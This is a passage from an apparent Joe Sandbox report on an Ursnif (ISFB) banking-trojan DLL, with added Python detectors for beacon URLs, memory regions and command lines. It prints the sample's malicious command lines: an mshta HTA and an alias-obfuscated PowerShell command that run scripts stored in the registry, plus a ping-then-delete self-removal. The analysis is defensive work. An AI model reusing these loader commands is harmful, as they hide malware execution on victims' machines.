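    joined = "".join(body[:-1]) + body[-1].rsplit(".", 1)[0]
    info["substitutions"] = sum(joined.count(t) for t in ("_2B", "_2F", "_2D"))
    b64 = joined.replace("_2B", "+").replace("_2F", "/").replace("_2D", "=")
    info["b64"] = b64
    if not B64_ALPHABET.match(b64) or len(b64) % 4:
        return info
    try:
        raw = base64.b64decode(b64, validate=True)
    except binascii.Error:
        return info
    info["ok"], info["ciphertext_len"] = True, len(raw)
    return info


def score_request(request_line: str, headers: Dict[str, str]) -> List[str]:
    """Return the reasons this request looks like ISFB beaconing (empty = none)."""
    reasons: List[str] = []
    ua = headers.get("User-Agent", "")
    # IE8 was never available for Windows 10 (which shipped with IE11), so this
    # User-Agent cannot come from a real browser, whatever the URI looks like.
    if "MSIE 8.0" in ua and "Windows NT 10.0" in ua:
        reasons.append("impossible User-Agent: MSIE 8.0 on Windows NT 10.0")
    info = decode_isfb_path(request_path(request_line))
    if info["segments"] >= 8:
        reasons.append(f"path chopped into {info['segments']} pseudo-directories")
    if info["substitutions"]:
        reasons.append(f"{info['substitutions']} ISFB _2B/_2F/_2D substitutions in the path")
    if info["ok"] and info["ciphertext_len"] % BLOCK_SIZE == 0:
        reasons.append(f"path decodes to {info['ciphertext_len']} bytes, "
                       f"a whole number of {BLOCK_SIZE}-byte cipher blocks")
    return reasons


def is_ursnif_like(request_line: str, headers: Dict[str, str]) -> bool:
    """Three independent traits is the bar used here (assumption, tune to taste)."""
    return len(score_request(request_line, headers)) >= 3


if __name__ == "__main__":
    for line, hdrs in CAPTURED + [BENIGN]:
        print(request_path(line)[:40], "->", score_request(line, hdrs) or "no hits")
```

The first request decodes to exactly 192 bytes (12 blocks of 16), which is the kind of structural check that survives a change of URI prefix or file extension between campaigns. For proxy or IDS logs the cheapest single rule is the User-Agent: `MSIE 8.0` together with `Windows NT 10.0` cannot be produced by a genuine browser, so it can be alerted on without any path decoding at all.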



                            Target ID:0
                            Start time:15:47:23
                            Start date:28/04/2022
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll"
                            Imagebase:0x1060000
                            File size:116736 bytes
                            MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:1
                            Start time:15:47:24
                            Start date:28/04/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1
                            Imagebase:0x1190000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:2
                            Start time:15:47:24
                            Start date:28/04/2022
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1
                            Imagebase:0xb90000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253552130.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.418912961.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.302561550.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.302666274.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253266400.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253321859.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253151966.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253379151.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.417250518.0000000004949000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253434533.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253537192.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.253077310.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.303583479.0000000004E0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.299890111.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.302615586.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high
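The Source: names in the Yara lists above and below (and the "Memory Dump Source" entries in the disassembly section) encode where each match was found. The Python below is an added example, not part of the Joe Sandbox report, that parses those names and ranks executable, non-image regions first, since that is where unpacked or injected code lives. The report itself confirms only the first field (Target ID in hex: 0x14 is Target 20, 0x19 is Target 25) and the fourth (base address: 0x5930000 matches "Offset: 05930000"); reading the fifth field as the page protection and the seventh as the region type is an assumption made here, consistent with the standard Windows MEMORY_BASIC_INFORMATION constants, and the sixth field is carried through undecoded.

```python
"""Decode the memory-dump names that the Yara 'Source:' lines and 'Memory Dump
Source' entries use, so hits can be ranked: a match in executable memory that is
not an image mapping is unpacked or injected code; a match in RW private memory
is usually heap (strings, decrypted config)."""
import re
from dataclasses import dataclass

# Standard Windows constants (MEMORY_BASIC_INFORMATION.Protect / .Type).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
REGION_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: target.stage.sequence.base.protect.flags.type.reserved.sdmp
# Target ID and base address are confirmed by this report (0x14 = Target 20,
# 0x19 = Target 25, base 0x5930000 = "Offset: 05930000"); treating the fifth
# field as Protect and the seventh as Type is an assumption that fits the
# Windows constants above.
SDMP = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})"
    r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$", re.IGNORECASE)


@dataclass(frozen=True)
class DumpRegion:
    target_id: int
    stage: int
    sequence: int
    base: int
    protect: int
    flags: int          # sixth field; left undecoded
    region_type: int

    def protect_name(self):
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    def type_name(self):
        return REGION_TYPE.get(self.region_type, hex(self.region_type))

    def executable(self):
        return bool(self.protect & 0xF0)   # PAGE_EXECUTE* are 0x10..0x80

    def likely_injected_code(self):
        """Executable but not a loaded image: what 'based on PE: false' plus RWX means."""
        return self.executable() and self.region_type != 0x1000000


def parse_sdmp(name):
    """Split one sdmp file name into its fields (see layout comment above)."""
    m = SDMP.match(name.strip())
    if not m:
        raise ValueError("not a Joe Sandbox sdmp name: %r" % name)
    f = m.groups()
    return DumpRegion(int(f[0], 16), int(f[1], 16), int(f[2]), int(f[3], 16),
                      int(f[4], 16), int(f[5], 16), int(f[6], 16))


def rank_sources(names):
    """Injected-code regions first, then everything else; one summary line per region."""
    regions = sorted({parse_sdmp(n) for n in names},
                     key=lambda r: (not r.likely_injected_code(), r.target_id, r.base))
    return ["target %d base 0x%X %s %s%s" % (
                r.target_id, r.base, r.protect_name(), r.type_name(),
                " <- injected code" if r.likely_injected_code() else "")
            for r in regions]


# Constructed input: four Source names copied from the Yara match lists in this report.
SOURCES = [
    "00000002.00000003.253379151.0000000005008000.00000004.00000020.00020000.00000000.sdmp",
    "00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp",
    "00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp",
    "00000019.00000000.368081484.0000000000D70000.00000040.80000000.00040000.00000000.sdmp",
]

if __name__ == "__main__":
    for line in rank_sources(SOURCES):
        print(line)
```

Run over the four names, the rundll32 region at 0x5930000 (Target 2) and the control.exe region at 0xD70000 (Target 25) come out first as RWX mapped sections, which is consistent with the NtMapViewOfSection-based injection visible in the disassembly further down; the 0x5008000 and 0x1ED7862C000 hits are RW private memory, i.e. heap data rather than code.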

                            Target ID:18
                            Start time:15:47:56
                            Start date:28/04/2022
                            Path:C:\Windows\System32\mshta.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                            Imagebase:0x7ff69f490000
                            File size:14848 bytes
                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:20
                            Start time:15:47:59
                            Start date:28/04/2022
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                            Imagebase:0x7ff6ba650000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            Target ID:21
                            Start time:15:47:59
                            Start date:28/04/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff647620000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:22
                            Start time:15:48:09
                            Start date:28/04/2022
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline
                            Imagebase:0x7ff625ee0000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:moderate

                            Target ID:23
                            Start time:15:48:14
                            Start date:28/04/2022
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9868.tmp" "c:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP"
                            Imagebase:0x7ff603b80000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Target ID:24
                            Start time:15:48:16
                            Start date:28/04/2022
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdline
                            Imagebase:0x7ff625ee0000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:moderate

                            Target ID:25
                            Start time:15:48:18
                            Start date:28/04/2022
                            Path:C:\Windows\System32\control.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\control.exe -h
                            Imagebase:0x7ff6f6bd0000
                            File size:117760 bytes
                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.368081484.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.369488668.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.370698760.0000000000D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            Reputation:moderate

                            Target ID:26
                            Start time:15:48:18
                            Start date:28/04/2022
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA96F.tmp" "c:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP"
                            Imagebase:0x7ff603b80000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Target ID:28
                            Start time:15:48:27
                            Start date:28/04/2022
                            Path:C:\Windows\explorer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Explorer.EXE
                            Imagebase:0x7ff6f3b00000
                            File size:3933184 bytes
                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:32
                            Start time:15:48:44
                            Start date:28/04/2022
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a983c091a8.tiff.dll
                            Imagebase:0x7ff7bb450000
                            File size:273920 bytes
                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:34
                            Start time:15:48:45
                            Start date:28/04/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff647620000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:36
                            Start time:15:48:46
                            Start date:28/04/2022
                            Path:C:\Windows\System32\PING.EXE
                            Wow64 process (32bit):false
                            Commandline:ping localhost -n 5
                            Imagebase:0x7ff701a50000
                            File size:21504 bytes
                            MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:39
                            Start time:15:48:59
                            Start date:28/04/2022
                            Path:C:\Windows\System32\RuntimeBroker.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                            Imagebase:0x7ff6b45b0000
                            File size:99272 bytes
                            MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
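The command lines of Targets 18, 20 and 32 above are the fileless part of this sample's execution chain: mshta.exe runs an inline HTA whose script is eval()'d straight out of the registry value TestLocal, powershell.exe hides gp and iex behind random aliases to Invoke-Expression the UrlsReturn value of the same HKCU\Software\AppDataLow\Software\Microsoft\<GUID> key, and cmd.exe uses ping as a sleep before deleting the dropped DLL. The following Python is an added example, not part of the Joe Sandbox report or of the sample, that runs these checks over the command lines copied from this page; the Proc/Finding records, the regular expressions and the tag names are this example's own, and the only facts it relies on are the command lines shown above.

```python
"""Triage of the process command lines in this report: flag the scripts that
mshta.exe and powershell.exe pull out of the registry, the alias-based hiding
of Invoke-Expression, the ping-as-sleep before self-deletion, and collect the
registry key/value names to export from the infected host."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    target_id: int      # "Target ID" of the process entry above
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    target_id: int
    tag: str
    detail: str


# Constructed input: the four command lines copied from the process list above.
PROCS = [
    Proc(18, r"C:\Windows\System32\mshta.exe",
         r'''C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'''),
    Proc(20, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'''),
    Proc(32, r"C:\Windows\System32\cmd.exe",
         r'''C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a983c091a8.tiff.dll'''),
    Proc(39, r"C:\Windows\System32\RuntimeBroker.exe",
         r"C:\Windows\System32\RuntimeBroker.exe -Embedding"),
]

_GUID = r"[0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12}"
# The key this sample keeps its scripts under, with any GUID-named subkey.
# Accepts the "HKCU:" drive form used by PowerShell and the doubled/tripled
# backslashes of the HTA string.
APPDATALOW_KEY = re.compile(
    r"HKCU[:\\]+Software\\+AppDataLow\\+Software\\+Microsoft\\+(" + _GUID + ")",
    re.IGNORECASE)
# Value name right after the key: '\\\TestLocal' in the HTA, '").UrlsReturn' in PowerShell.
VALUE_AFTER_KEY = re.compile(r'(?:\\+|"\)\.)(\w+)')
NEW_ALIAS = re.compile(r"new-alias\s+-name\s+(\w+)\s+-value\s+(\w+)", re.IGNORECASE)
PING_DEL = re.compile(r'ping\s+\S+\s+-n\s+(\d+)\s*&&\s*del\s+"?([^"]+)', re.IGNORECASE)


def registry_reads(cmdline):
    """[(normalised key, value name)] for every read of the AppDataLow GUID key."""
    reads = []
    for m in APPDATALOW_KEY.finditer(cmdline):
        key = "HKCU\\Software\\AppDataLow\\Software\\Microsoft\\" + m.group(1).upper()
        v = VALUE_AFTER_KEY.match(cmdline, m.end())
        reads.append((key, v.group(1) if v else None))
    return reads


def triage(proc):
    """Findings for one process record."""
    findings = []
    image, low = proc.image.lower(), proc.cmdline.lower()
    reads = registry_reads(proc.cmdline)

    if image.endswith("mshta.exe") and "about:<hta:application" in low:
        findings.append(Finding(proc.target_id, "mshta_inline_hta",
                                "HTA body passed on the command line, no .hta file on disk"))
        if "regread(" in low and reads:
            findings.append(Finding(proc.target_id, "script_from_registry",
                                    "eval() of registry value %s\\%s" % reads[0]))

    if image.endswith("powershell.exe"):
        aliases = {n.lower(): t.lower() for n, t in NEW_ALIAS.findall(proc.cmdline)}
        hidden = sorted(a for a, t in aliases.items() if t in ("iex", "invoke-expression"))
        if hidden:
            findings.append(Finding(proc.target_id, "alias_obfuscated_iex",
                                    "Invoke-Expression reached through alias " + ", ".join(hidden)))
        if reads and (hidden or "iex" in low or "invoke-expression" in low):
            findings.append(Finding(proc.target_id, "script_from_registry",
                                    "Invoke-Expression of registry value %s\\%s" % reads[0]))

    m = PING_DEL.search(proc.cmdline)
    if image.endswith("cmd.exe") and m:
        n = int(m.group(1))   # N echo requests, one second apart: roughly N-1 s on localhost
        findings.append(Finding(proc.target_id, "ping_sleep_self_delete",
                                "ping -n %d (about %d s), then del %s" % (n, max(n - 1, 0), m.group(2))))
    return findings


def triage_all(procs):
    return [f for p in procs for f in triage(p)]


def registry_iocs(procs):
    """Key -> value names read by any process: what to export from a live host."""
    iocs = {}
    for p in procs:
        for key, value in registry_reads(p.cmdline):
            iocs.setdefault(key, set()).add(value)
    return iocs


if __name__ == "__main__":
    for f in triage_all(PROCS):
        print("[Target %d] %s: %s" % (f.target_id, f.tag, f.detail))
    for key, values in registry_iocs(PROCS).items():
        print("export from host:", key, sorted(values))
```

Because the mshta and PowerShell payloads never touch disk, registry_iocs() is the first thing to act on: export that GUID key (reg export, or Get-ItemProperty on the HKCU: path) from an infected host before the stored TestLocal and UrlsReturn blobs are lost. The GUID is sample-specific, so the key regex matches any GUID-named subkey under AppDataLow\Software\Microsoft rather than this one.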


                              Control-flow Graph
                              (graph rendering omitted: function at 0x059400DC, basic blocks 0x059400DC-0x05940562; the imported calls it makes are listed under APIs below)
                              APIs
                              • RtlInitializeCriticalSection.NTDLL(0595A428), ref: 059400FA
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memset.NTDLL ref: 0594012B
                              • RtlInitializeCriticalSection.NTDLL(05F3C2D0), ref: 0594013C
                                • Part of subcall function 05945261: RtlInitializeCriticalSection.NTDLL(0595A400), ref: 05945285
                                • Part of subcall function 05945261: RtlInitializeCriticalSection.NTDLL(0595A3E0), ref: 0594529B
                                • Part of subcall function 05945261: GetVersion.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059452AC
                                • Part of subcall function 05945261: GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059452E0
                                • Part of subcall function 05948452: RtlAllocateHeap.NTDLL(00000000,-00000003,773D9EB0), ref: 0594846C
                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,05939100,?), ref: 05940165
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05940176
                              • CloseHandle.KERNEL32(0000059C,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 0594018A
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 059401D3
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 059401E6
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 059401FB
                              • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0594022B
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05940240
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 0594024A
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05940257
                              • GetShellWindow.USER32 ref: 05940272
                              • GetWindowThreadProcessId.USER32(00000000), ref: 05940279
                              • memcpy.NTDLL(0595A2F4,?,00000018,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059402B5
                              • CreateEventA.KERNEL32(0595A1E8,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,05939100,?), ref: 05940333
                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0594035D
                              • OpenEventA.KERNEL32(00100000,00000000,05F3B9C8,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05940385
                              • CreateEventA.KERNEL32(0595A1E8,00000001,00000000,05F3B9C8,?,?,?,?,?,?,?,05939100,?), ref: 0594039A
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059403A0
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05940438
                              • SetEvent.KERNEL32(?,0594C384,00000000,00000000,?,?,?,?,?,?,?,05939100,?), ref: 059404CE
                              • RtlAllocateHeap.NTDLL(00000000,00000043,0594C384), ref: 059404E3
                              • wsprintfA.USER32 ref: 05940513
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                              • String ID:
                              • API String ID: 3929413950-0
                              • Opcode ID: a4a86891c9d55e483ae122ab45e450a2ebae60d04231f423dc8d17c265b078d3
                              • Instruction ID: 32b4732600559984ac806f59c5c8277e29c4c3a837954bebc751fb0ac0db7018
                              • Opcode Fuzzy Hash: a4a86891c9d55e483ae122ab45e450a2ebae60d04231f423dc8d17c265b078d3
                              • Instruction Fuzzy Hash: 2EC19DB0918348DFC720DF65E94ED2ABFE9FB89211B41491DF646CB200DB34A864CF55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph
                              (graph rendering omitted: function at 0x05938FEC, basic blocks 0x05938FEC-0x0593912E; registers a vectored exception handler and calls the function at 0x059400DC shown above)
                              APIs
                              • StrRChrA.SHLWAPI(05F3B5B0,00000000,0000005C,?,?,?), ref: 05939028
                              • _strupr.NTDLL ref: 0593903E
                              • lstrlen.KERNEL32(05F3B5B0,?,?), ref: 05939046
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 059390C6
                              • RtlAddVectoredExceptionHandler.NTDLL(00000000,0595076B), ref: 059390ED
                              • GetLastError.KERNEL32(?,?,?,?), ref: 05939107
                              • RtlRemoveVectoredExceptionHandler.NTDLL(057505B8), ref: 0593911D
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                              • String ID:
                              • API String ID: 2251957091-0
                              • Opcode ID: 6640d7ffdf086ae7446846787135d98304609bb0ad1d019a6d0f8a2535db5194
                              • Instruction ID: d5b43c7ad1cfdf5bbc345339728bc0d5ca0e3dddcde5227f0425a14c0b463346
                              • Opcode Fuzzy Hash: 6640d7ffdf086ae7446846787135d98304609bb0ad1d019a6d0f8a2535db5194
                              • Instruction Fuzzy Hash: C6310A72A28311DFDB10AFF8ED8BA6EFFA8BB04211B450565FA12E3140DF7598518B94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0593C478
                              • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0593C48B
